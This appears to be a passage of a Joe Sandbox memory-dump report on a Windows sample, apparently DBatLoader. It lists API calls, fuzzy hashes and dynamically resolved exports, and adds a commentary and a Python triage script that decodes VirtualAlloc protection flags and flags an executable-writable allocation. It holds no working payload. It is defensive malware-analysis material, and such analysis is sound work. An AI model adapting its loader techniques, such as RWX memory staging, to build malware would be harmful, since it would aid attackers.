  • Part of subcall function 032B5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032B5E9B
  • Part of subcall function 032B5DDC: RegQueryValueExA.ADVAPI32(?,032B6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001), ref: 032B5EB9
  • Part of subcall function 032B5DDC: RegCloseKey.ADVAPI32(?,032B5EE8,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032B5EDB
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
• Instruction ID: b09f5128d4a4cdde2732850970549b1630e423a2dd5c74fbda57a3ea02405bfb
• Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
• Instruction Fuzzy Hash: 54E06D72A113148FCF10DE58C9C0A8633E8AF09790F140691AC98CF34AD3B0DAA08BD0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032B8D78
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
• Instruction ID: 259172643d9d6d67becfa50880ae2438c62c2bcf98518b09b30ef74c3864ae3a
• Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
• Instruction Fuzzy Hash: 64D05B763182517AD220E55A5C84EEB5BECCFC57B0F14063AB558C7181D6608C018371
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 03308838: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
  • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
• Process32First.KERNEL32(?,00000128), ref: 03308AE5
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: AddressProc$FirstHandleModuleProcess32
• String ID:
• API String ID: 2774106396-0
• Opcode ID: a61ae50174cf867dbf7150e4ccfae690f933dd31855620bc3145320aefd9702a
• Instruction ID: b5ebf6ee927052bb06ed9b3e0622050bf78dfa70f0cb8d1a9e6b92aa279565a4
• Opcode Fuzzy Hash: a61ae50174cf867dbf7150e4ccfae690f933dd31855620bc3145320aefd9702a
• Instruction Fuzzy Hash: C2C08CA2A02320178E10F6F82CD88C3878CCE491F370848B2B509EB142D2358C1092A0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
• Instruction ID: 86bcfd6edabc9705dfc9310cd310a6a9626536a5ae5762b02a2f888499de012d
• Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
• Instruction Fuzzy Hash: 8FC012B56712314BFF31E6999CC0BA563EC9B053D1F5800A1E504DB341E260E8504350
Uniqueness

Uniqueness Score: -1.00%

APIs
• timeSetEvent.WINMM(00002710,00000000,0331809C,00000000,00000001), ref: 033180B8
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: 8fa96dadf32e4f756d12da986ffba8f10886f0d13de842ac16e7adfbe21a04f2
• Instruction ID: 905394690ffd60708950b7d2e5836bbd45a33c80cf1d1a2eac6bcb610f83377a
• Opcode Fuzzy Hash: 8fa96dadf32e4f756d12da986ffba8f10886f0d13de842ac16e7adfbe21a04f2
• Instruction Fuzzy Hash: CEC09BF4B603047AF524F5B51CD1F6315ACD304741F5054117705FD2C1D2D65C504654
Uniqueness

Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 032B4F47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2525500382-0
                                                                                                    • Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction ID: 351ad1066289508ba29790c12cb04fc7d01388f3f5ec722bbb9deb4eb817dbb5
                                                                                                    • Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction Fuzzy Hash: 40B0922823835350FA20F0A209417F241BC0B003C4F8800109D18C50C7D988C0A55035
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 032B4F5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction ID: f3e8f8ae27e0c39ba860e91227ec3e402efe1560e3a215c0f8acfbc3a978f957
                                                                                                    • Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction Fuzzy Hash: 4CA022AC82033308CF0BFA2E00A0ABA22323FC0380BCCC0A800000F000CF3A80A0C020
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 032CE99A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 27a7f2f923741d910209d786271832bb55285ffad64e2d8768516367b8751d79
                                                                                                    • Instruction ID: 5184678eb29b9ae427e925f566fa48ce6c7f1c45dd39c9032d861a9b48700928
                                                                                                    • Opcode Fuzzy Hash: 27a7f2f923741d910209d786271832bb55285ffad64e2d8768516367b8751d79
                                                                                                    • Instruction Fuzzy Hash: AA1148782517468BC754DF18C8C0B82F7E5EF48391F10C62AE99A8F785D3B4E9448BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,032B1A9F,?,032B205D), ref: 032B167E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 150725a5a679f9a9fe0464c4080aeb867bcba5bf433aad586da81e7e35f815b3
                                                                                                    • Instruction ID: 989a19540834919433ddafcea10c09eb1e601893f8e5070e73e2e6f6d96fb889
                                                                                                    • Opcode Fuzzy Hash: 150725a5a679f9a9fe0464c4080aeb867bcba5bf433aad586da81e7e35f815b3
                                                                                                    • Instruction Fuzzy Hash: B0F049F07107004FDB15EF7EA994301BBE6E789385F24813DE609DB388E77994018B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,032B205D), ref: 032B1740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 292d4e304001cc057f5ce5ba01cc78b57262ef6da8f78170d842727feb528d3d
                                                                                                    • Instruction ID: 7dbf4eda5ca9e1ed776beacf7431103ae99eacb2ad8ef40a78952859ff108d75
                                                                                                    • Opcode Fuzzy Hash: 292d4e304001cc057f5ce5ba01cc78b57262ef6da8f78170d842727feb528d3d
                                                                                                    • Instruction Fuzzy Hash: 8CF09AB6A00B556BD3209E5E9CC0B82BBA8FB117A0F050239FA089B344D7B1A8508BD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 032B17A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: bd1ec9eac06c9e1fe8901bf8c25d856a26f75ed5687c72466345e704ca103aed
                                                                                                    • Instruction ID: b3cb0cdd21b88d8d771555c78457779d2c25911899413bde46e520e0b63c1d21
                                                                                                    • Opcode Fuzzy Hash: bd1ec9eac06c9e1fe8901bf8c25d856a26f75ed5687c72466345e704ca103aed
                                                                                                    • Instruction Fuzzy Hash: C5E04F753203016FD7109A794C90B53AAE8EB457D1F284565F641DB241D7B0F85087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                    • API String ID: 667068680-597814768
                                                                                                    • Opcode ID: 86b1fa445c1ce27fa6b0d7b6af330337ea9b5261cc8a48b08b9d58393abc083f
                                                                                                    • Instruction ID: a954cdf40d5ed1f20b6bafbbad1d9a0e2c411dc8025e1fab10f5c7eda0f090da
                                                                                                    • Opcode Fuzzy Hash: 86b1fa445c1ce27fa6b0d7b6af330337ea9b5261cc8a48b08b9d58393abc083f
                                                                                                    • Instruction Fuzzy Hash: 083107B5A11750AFDF48FBB4D8E6AA937B8EB09740F004561F065EF24AD2B48880CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 032F7059
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,032F71A6,?,00008000), ref: 032F707D
                                                                                                    • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 032F708A
                                                                                                    • LoadLibraryA.KERNEL32(imm32.dll,00000000,032F71A6,?,00008000), ref: 032F70A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 032F70C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 032F70DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 032F70F2
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 032F7107
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 032F711C
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 032F7131
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 032F7146
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 032F715B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 032F7170
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 032F7185
                                                                                                    • SetErrorMode.KERNEL32(?,032F71AD,00008000), ref: 032F71A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                    • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                    • API String ID: 3397921170-3950384806
                                                                                                    • Opcode ID: b8ea0b0f01905477398549f48762f582577f768bc70b112c70165d84075dd70b
                                                                                                    • Instruction ID: 00793e46725d50ce741e565a6327dc6281d77a4e488e3db0c54270408c23e6be
                                                                                                    • Opcode Fuzzy Hash: b8ea0b0f01905477398549f48762f582577f768bc70b112c70165d84075dd70b
                                                                                                    • Instruction Fuzzy Hash: 0731ED75660344AFEB08FFA9E8D696AB7FCE744780F008465F6159B60AE7B498C4CF10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
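The entries above print raw hexadecimal arguments, so the security-relevant detail is easy to miss: the VirtualAlloc at 032CE99A requests 0x1000 bytes with flAllocationType 0x1000 (MEM_COMMIT) and flProtect 0x40 (PAGE_EXECUTE_READWRITE), i.e. a writable and executable region, while the allocations at 032B167E and 032B1740 use 0x4 (PAGE_READWRITE, the latter with MEM_TOP_DOWN) and the VirtualFree at 032B17A0 passes 0x8000 (MEM_RELEASE). The SetErrorMode value 0x8000 at 032F7059 is SEM_NOOPENFILEERRORBOX. A further caveat for triage: the two GetProcAddress resolver functions at 0330884C and 032F707D resolve exactly the export lists that Delphi's TlHelp32 and Imm runtime units load dynamically, which is consistent with DBatLoader being a Delphi binary; treat them as runtime-library initialization rather than loader logic unless the disassembly shows otherwise. The script below is an added example written for this page, not Joe Sandbox code or part of the sample; it parses API lines in the report's own format (the sample input is copied from the entries above and is constructed for the example) and decodes the memory constants, flagging any allocation that requests an executable protection. The assumption is that 8-hex-digit arguments are numeric immediates and anything else is a name, which holds for the lines shown here.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# Constructed sample input: API lines copied from this report section, as the
# sandbox prints them. '?' marks an argument the sandbox could not resolve.
SAMPLE_API_LINES = """
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 032CE99A
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,032B1A9F,?,032B205D), ref: 032B167E
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,032B205D), ref: 032B1740
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 032B17A0
• SetErrorMode.KERNEL32(00008000), ref: 032F7059
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
"""

# Windows constants from winnt.h / memoryapi.h / errhandlingapi.h.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
             0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
FREE_FLAGS = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
SEM_FLAGS = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
             0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
EXECUTABLE_PAGES = {0x10, 0x20, 0x40, 0x80}
WRITABLE_EXEC_PAGES = {0x40, 0x80}

Arg = Union[int, str, None]
# "• Api.MODULE(arg,arg,...), ref: 0ADDRESS" as printed in the report's APIs lists.
_LINE_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
_HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int
    decoded: Dict[str, object] = field(default_factory=dict)
    findings: List[str] = field(default_factory=list)


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None            # unresolved by the sandbox
    if _HEX_RE.match(token):
        return int(token, 16)  # assumption: 8 hex digits is a numeric immediate
    return token               # an exported name or a DLL name


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as 'A|B'; bits not in the table stay as hex so nothing is hidden."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def decode_protect(value: int) -> str:
    """PAGE_* protections: one base value in the low byte plus optional modifier bits."""
    base = value & 0xFF
    parts = [PAGE_BASE.get(base, hex(base))]
    parts += [name for bit, name in sorted(PAGE_MODIFIERS.items()) if value & bit]
    return "|".join(parts)


def _decode(call: ApiCall) -> None:
    a = call.args
    if call.api == "VirtualAlloc" and len(a) >= 4:
        call.decoded["size"] = a[1]
        if isinstance(a[2], int):
            call.decoded["alloc_type"] = decode_flags(a[2], MEM_FLAGS)
        if isinstance(a[3], int):
            call.decoded["protect"] = decode_protect(a[3])
            if a[3] & 0xFF in WRITABLE_EXEC_PAGES:
                call.findings.append("rwx-allocation")     # classic shellcode/unpack staging
            elif a[3] & 0xFF in EXECUTABLE_PAGES:
                call.findings.append("executable-allocation")
    elif call.api == "VirtualFree" and len(a) >= 3 and isinstance(a[2], int):
        call.decoded["free_type"] = decode_flags(a[2], FREE_FLAGS)
    elif call.api == "SetErrorMode" and a and isinstance(a[0], int):
        call.decoded["mode"] = decode_flags(a[0], SEM_FLAGS)
    elif call.api == "GetProcAddress" and len(a) >= 2 and isinstance(a[1], str):
        call.decoded["export"] = a[1]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every well-formed API line; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        api, module, raw_args, ref = m.groups()
        args = [_parse_arg(t) for t in raw_args.split(",")] if raw_args else []
        call = ApiCall(api, module, args, int(ref, 16))
        _decode(call)
        calls.append(call)
    return calls


def resolved_exports(calls: List[ApiCall]) -> List[str]:
    """Export names the sample resolves at run time through GetProcAddress, in call order."""
    return [str(c.decoded["export"]) for c in calls if "export" in c.decoded]


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_API_LINES):
        tag = " ".join(c.findings) or "-"
        print(f"{c.ref:08X} {c.api:<16} {c.decoded} {tag}")
```

Run on the constructed input, the script labels the 032CE99A allocation as rwx-allocation and the other two as plain PAGE_READWRITE commits; feeding it the full APIs lists of a report gives a quick inventory of executable allocations and dynamically resolved exports without reading each hex argument by hand.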

                                                                                                    APIs
• GetObjectA.GDI32(00000000,00000054,?), ref: 032D5014
• GetDC.USER32(00000000), ref: 032D5025
• CreateCompatibleDC.GDI32(00000000), ref: 032D5036
• CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 032D5082
• CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 032D50A6
• SelectObject.GDI32(?,?), ref: 032D5303
